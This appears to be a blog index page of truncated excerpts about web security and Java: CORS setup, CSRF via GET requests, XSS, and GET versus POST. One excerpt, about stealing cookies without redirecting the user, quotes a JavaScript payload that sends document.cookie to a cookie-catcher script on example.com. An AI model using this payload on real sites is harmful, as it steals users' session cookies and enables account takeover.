Get deeper into java
Let’s say we wanted to provide a service at http://orlandotemp.net/temp that responds to AJAX GET requests from the external site example.com with a JSON object containing the current temperature in Orlando, FL. All we need to do to enable this...
For jboss we can use a solution from thetransactioncompany: web.xml: maven: If you use apache Tomcat you can use built-in CorsFilter: web.xml: pom.xml:
Imagine if www.example.com processed fund transfers through a GET request that will include two parameters: the amount that is to be transferred and the identifier of the account to which the money will be...
We know that it is possible to steal the cookie by redirecting to “False” page etc like this document.location= “http://www.example.com/cookie_catcher.php?c=” + document.cookie But how to do without redirecting the user? If you have full...
Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users. The most common example can be...
The GET request is marginally less secure than the POST request. Neither offers true “security” by itself; using POST requests will not magically make your website secure against malicious attacks by a noticeable amount. However, using...
